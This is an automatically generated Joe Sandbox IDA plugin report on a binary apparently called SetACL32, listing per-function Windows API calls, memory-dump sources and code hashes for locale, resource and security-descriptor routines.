                • Instruction ID: 16a70a425e7e5de6d53d1fb583fa0e5c71ca62b71d63ff4a5f3b9a7a2445cc7f
                • Opcode Fuzzy Hash: 6ea596e257a8fcb2e32d25dffe28d24ed9a72879e72b885d6c3c6edce8ee4b96
                • Instruction Fuzzy Hash: DF218332F08104AAFF308F18C905A97F3AAAB51B68B57846CE909D7104F7B2DD40E750
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F9A1CD
                • IsValidCodePage.KERNEL32(00000000), ref: 00F9A216
                • IsValidLocale.KERNEL32(?,00000001), ref: 00F9A225
                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9A26D
                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9A28C
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                • String ID:
                • API String ID: 949163717-0
                • Opcode ID: 26305100e010f47d42b261a46d96070ea160d29d268eb610b66a895679208ff3
                • Instruction ID: 7ffbddec2d4753678aaff3c3fda3a9762b8af6eb65eacc5dc4cab2886e54d160
                • Opcode Fuzzy Hash: 26305100e010f47d42b261a46d96070ea160d29d268eb610b66a895679208ff3
                • Instruction Fuzzy Hash: 47517E71E00219ABFF10EFA5DC41BBA77B8FF44710F150069A911E7190E7749A84EFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindResourceW.KERNEL32(00000000,00000001,00000010,746D712B,?,?), ref: 00F6277B
                • LoadResource.KERNEL32(00000000,00000000), ref: 00F62788
                • LockResource.KERNEL32(00000000), ref: 00F62795
                • FreeResource.KERNEL32(00000000), ref: 00F627EF
                  • Part of subcall function 00F62850: VerQueryValueW.VERSION(00000000,?,?,?,\VarFileInfo\Translation,00000018,746D712B,00000000,?,00000000), ref: 00F62906
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Resource$FindFreeLoadLockQueryValue
                • String ID:
                • API String ID: 4268186394-0
                • Opcode ID: e528a00d941629d9ce1925d588bdf48117c2074419c589c6bae84a27e6cd3b38
                • Instruction ID: 0b109d4c15812664ea165d190e8650ded00327bc59ca9f5913a70d3463ca1d23
                • Opcode Fuzzy Hash: e528a00d941629d9ce1925d588bdf48117c2074419c589c6bae84a27e6cd3b38
                • Instruction Fuzzy Hash: A331D4B1D006089BDB10DF74DC45BEEBBB5FF48720F14462EE801A3280EB79AA44DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F8BA25
                • IsDebuggerPresent.KERNEL32 ref: 00F8BAF1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F8BB11
                • UnhandledExceptionFilter.KERNEL32(?), ref: 00F8BB1B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: c4b663f71c5ff6e6a665370c512dcb1cfc08b1e0d5cd452346bd6287ab30c59a
                • Instruction ID: e3670347775b4b77caac563b2ac0d170225c02916ac07ead13e9d67e503a439f
                • Opcode Fuzzy Hash: c4b663f71c5ff6e6a665370c512dcb1cfc08b1e0d5cd452346bd6287ab30c59a
                • Instruction Fuzzy Hash: 603118B5D0521C9BDF20EFA4DD89BCDBBB8AF08300F1040AAE40DAB250EB755A85DF45
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99BC7
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99C11
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99CD7
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale$ErrorLast_free
                • String ID:
                • API String ID: 3140898709-0
                • Opcode ID: 046727cda2ee7ad26878b3cd3aba4d1f2544fd36428310145d219c46b3aa8fc7
                • Instruction ID: abbbfa6d268741a9e3a3f806d0a4e6e78ac0c5dba20361b62449f67fb2c0c2ce
                • Opcode Fuzzy Hash: 046727cda2ee7ad26878b3cd3aba4d1f2544fd36428310145d219c46b3aa8fc7
                • Instruction Fuzzy Hash: 2B61C0719182179FFF68DF2CCC82BAA77A8EF04320F11407AE905C6185E7B9D985EB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F8F29B
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F8F2A5
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F8F2B2
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 51d7362e96afd06f1066060b39acec6a973224b238dd08306a9365d79576bf34
                • Instruction ID: 27debffd969aa37c4b941404634d8a65f64b1b231a48f2baf1b4f6d391f99de4
                • Opcode Fuzzy Hash: 51d7362e96afd06f1066060b39acec6a973224b238dd08306a9365d79576bf34
                • Instruction Fuzzy Hash: BA31C27590122CABCB21EF24DD89BCDBBB8BF18310F5041EAE41CA7290E7749B859F55
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F8BC9B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: bffa026de640578bcfe963204c534b80155635b8d8ffc52f0af24a0e7955920b
                • Instruction ID: b06458298b67336d5266174e327f36d54c29681210041df1c23a8dc37de19ff9
                • Opcode Fuzzy Hash: bffa026de640578bcfe963204c534b80155635b8d8ffc52f0af24a0e7955920b
                • Instruction Fuzzy Hash: D651AFB2D15609DFDB24CF64DA86BEEBBF0FB48325F14846AC805EB250D375A940DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99E1A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free$InfoLocale
                • String ID:
                • API String ID: 2003897158-0
                • Opcode ID: f9c62ca63dc1d1b25d4e2186fb1530d5d97d2fa837a61e596f846c92012a32de
                • Instruction ID: 39a632d66c57b108de67537fdacdf6583e78bbb01d7a6de1f57dd4dab04f18e9
                • Opcode Fuzzy Hash: f9c62ca63dc1d1b25d4e2186fb1530d5d97d2fa837a61e596f846c92012a32de
                • Instruction Fuzzy Hash: B3218672A182065BFF28EB69DC41ABA77ACEF45321B11007DF901C6141EBB9DD44EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • EnumSystemLocalesW.KERNEL32(00F99B73,00000001,00000000,?,-00000050,?,00F9A1A1,00000000,?,?,?,00000055,?), ref: 00F99ABF
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 2bd3b8fc4c1bdc6d043d9e24cc2664c2d6f1784dfe3cbec5cfa2d9cd9af4c99a
                • Instruction ID: 744ecf41c88ff94f25130046b9539edb5d223965e51bd59d6eb14d30c121bb12
                • Opcode Fuzzy Hash: 2bd3b8fc4c1bdc6d043d9e24cc2664c2d6f1784dfe3cbec5cfa2d9cd9af4c99a
                • Instruction Fuzzy Hash: CD1129376083055FEF189F39D89167AB791FF80368B15442CE94687A40D3B5A902D740
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F99D8F,00000000,00000000,?), ref: 00F9A01E
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$InfoLocale
                • String ID:
                • API String ID: 3736152602-0
                • Opcode ID: e04c0e276e78fbfb53ec2d8b973ffddf90514e8cf3319d66d6986e96bde877ad
                • Instruction ID: 514ed755ad9435c0a54350752cde3819d89b1538a73b0f6fcadb7593f3956043
                • Opcode Fuzzy Hash: e04c0e276e78fbfb53ec2d8b973ffddf90514e8cf3319d66d6986e96bde877ad
                • Instruction Fuzzy Hash: D6F0A936E10215AFEF285B658C05BBA7768EB40764F150428EC15A3190DA75FD41E5D1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • EnumSystemLocalesW.KERNEL32(00F99DC6,00000001,?,?,-00000050,?,00F9A165,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F99B32
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 62416975661e3339be15412c74def16c6953bc74c5e72dfe5c9274998d84c5cf
                • Instruction ID: be97d693e366a6f8451cf316d33bf2ae6db8221d534d69a7e9a29bd1a5972b05
                • Opcode Fuzzy Hash: 62416975661e3339be15412c74def16c6953bc74c5e72dfe5c9274998d84c5cf
                • Instruction Fuzzy Hash: 63F0F6362043055FEF245F39AC81A7ABB95EFC1368B16442DF9458B680D6F59D02EA50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F94E5F: EnterCriticalSection.KERNEL32(?,?,00F94345,?,00FC70B0,0000000C), ref: 00F94E6E
                • EnumSystemLocalesW.KERNEL32(00F9A2B6,00000001,00FC7290,0000000C,00F9A702,00000000), ref: 00F9A2FB
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalEnterEnumLocalesSectionSystem
                • String ID:
                • API String ID: 1272433827-0
                • Opcode ID: 76f6c7368a0265649788e5ee066a56fd1d317a8af1494a31ba006b87cf1f6a7a
                • Instruction ID: aebb2db19edf16bcafa733a0f4d00c5b19e27c1472416b28b807ccbb492730cd
                • Opcode Fuzzy Hash: 76f6c7368a0265649788e5ee066a56fd1d317a8af1494a31ba006b87cf1f6a7a
                • Instruction Fuzzy Hash: 87F03C76A443199FEB10EF58D942B9D77B0EB45721F10401AF814972A0CBBA9941AF81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • EnumSystemLocalesW.KERNEL32(00F9995B,00000001,?,?,?,00F9A1C3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F99A39
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: e3e474e1a1c0270313a58156cb713ca17e8e56ee04dd265e73e789ed2afcb7dd
                • Instruction ID: 304506cb913b61b2d6e5dfddf47e9ace3f4cb48c1530adb3e43e90635878699e
                • Opcode Fuzzy Hash: e3e474e1a1c0270313a58156cb713ca17e8e56ee04dd265e73e789ed2afcb7dd
                • Instruction Fuzzy Hash: 7AF05C3530020557DF149F7AD8456667F50EFC2720B07405DEE058B141C275D843D790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F9074F,?,20001004,00000000,00000002,?,?,00F8FD3A), ref: 00F9A83A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 6142097ef75281b98971db363b911166029df55b785ea9062d9f2eec00b4e6ef
                • Instruction ID: 2c81f2238641df306905cc7366c11e9481cc172898d360e1951a36f2291885b4
                • Opcode Fuzzy Hash: 6142097ef75281b98971db363b911166029df55b785ea9062d9f2eec00b4e6ef
                • Instruction Fuzzy Hash: B7E04F3250022CBBDF122F61DC04FAE3E25EF44760F004021FC1566161DB769D21BAD6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 9129b5c5acd562e01b733c1c6452ce3e431c62711147a324b4f6dce8020ea1d5
                • Instruction ID: c7b4fad67394afca7672a7dc787997355e7b44615c49f24c6697ba3452b5b8f8
                • Opcode Fuzzy Hash: 9129b5c5acd562e01b733c1c6452ce3e431c62711147a324b4f6dce8020ea1d5
                • Instruction Fuzzy Hash: 5AA02470101115CF53004F30DF0730C35DC7F051D1F0040555000C3130D73044407745
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
                • Instruction ID: 534ca4e6334354cc0adb6f9cc54e2bd38739ddaff7ba4b207d65dc66b86b3044
                • Opcode Fuzzy Hash: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
                • Instruction Fuzzy Hash: 4AE08C72A21228EBCB15DFC8C94598AF3ECFB88B50B1540A7F511D3250C274DE00E7D0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsValidSecurityDescriptor.ADVAPI32(?,746D712B,00000000,00000000,00000000), ref: 00F83411
                • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83459
                • SysAllocString.OLEAUT32(__systemsecurity), ref: 00F834AC
                • SysAllocString.OLEAUT32(SetSD), ref: 00F83526
                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00F835A6
                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00F835BA
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F835D6
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F835F6
                • VariantInit.OLEAUT32(?), ref: 00F83600
                • VariantClear.OLEAUT32(?), ref: 00F83640
                • VariantClear.OLEAUT32(?), ref: 00F83679
                • SysFreeString.OLEAUT32(77B5D4FF), ref: 00F836E2
                • _com_issue_error.COMSUPP ref: 00F83767
                • _com_issue_error.COMSUPP ref: 00F83771
                • _com_issue_error.COMSUPP ref: 00F8377B
                • _com_issue_error.COMSUPP ref: 00F83785
                • _com_issue_error.COMSUPP ref: 00F8378F
                • _com_issue_error.COMSUPP ref: 00F83799
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _com_issue_error$String$AllocArraySafeVariant$ClearDataDescriptorSecurity$AccessCreateFreeInitLengthUnaccessValid
                • String ID: Put failed, returned 0x%x$SetSD$\\.\$__systemsecurity$__systemsecurity=@
                • API String ID: 1425945781-386781740
                • Opcode ID: 2d1e7eb9edd789aa8128a6a06be13f41a6b7f94de9ae513c7afc84d55f3de920
                • Instruction ID: e97a65b4c8f97b3752e00c2ce7f92f3fa5425911aa1a058902f8c86f5ce179db
                • Opcode Fuzzy Hash: 2d1e7eb9edd789aa8128a6a06be13f41a6b7f94de9ae513c7afc84d55f3de920
                • Instruction Fuzzy Hash: A4B162B1E00219EFEB10EFA4CC45BDEBBB8AF04B10F144559E914EB291D775DA04DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83801
                • SysAllocString.OLEAUT32(GetSD), ref: 00F83854
                • SysAllocString.OLEAUT32(00FBFF98), ref: 00F838DC
                • VariantInit.OLEAUT32(?), ref: 00F83903
                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 00F83951
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00F83967
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F83985
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F839C1
                • VariantClear.OLEAUT32(?), ref: 00F839D2
                • SysFreeString.OLEAUT32(-00000001), ref: 00F83A2E
                • _com_issue_error.COMSUPP ref: 00F83AB6
                • _com_issue_error.COMSUPP ref: 00F83AC0
                • _com_issue_error.COMSUPP ref: 00F83ACA
                • _com_issue_error.COMSUPP ref: 00F83AD4
                • _com_issue_error.COMSUPP ref: 00F83ADE
                • _com_issue_error.COMSUPP ref: 00F83AE8
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _com_issue_error$ArraySafeString$Alloc$BoundDataVariant$AccessClearFreeInitUnaccess
                • String ID: GetSD$__systemsecurity=@
                • API String ID: 1002945065-3672729512
                • Opcode ID: 21f13a996173b1c7ef447298b8001ff2c48c37c5d6dcb4408ecae03cb6006844
                • Instruction ID: 2e6b1fa119302097f5f1859b997496d19e9d8eb6b6184101bea51879f7059f16
                • Opcode Fuzzy Hash: 21f13a996173b1c7ef447298b8001ff2c48c37c5d6dcb4408ecae03cb6006844
                • Instruction Fuzzy Hash: 5FA16FB1D0030AEBEB10EFA5CD45BDEBBF8AF04710F104529E515A72A1D779DA04EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F70AAA
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • std::locale::_Init.LIBCPMT ref: 00F70B1A
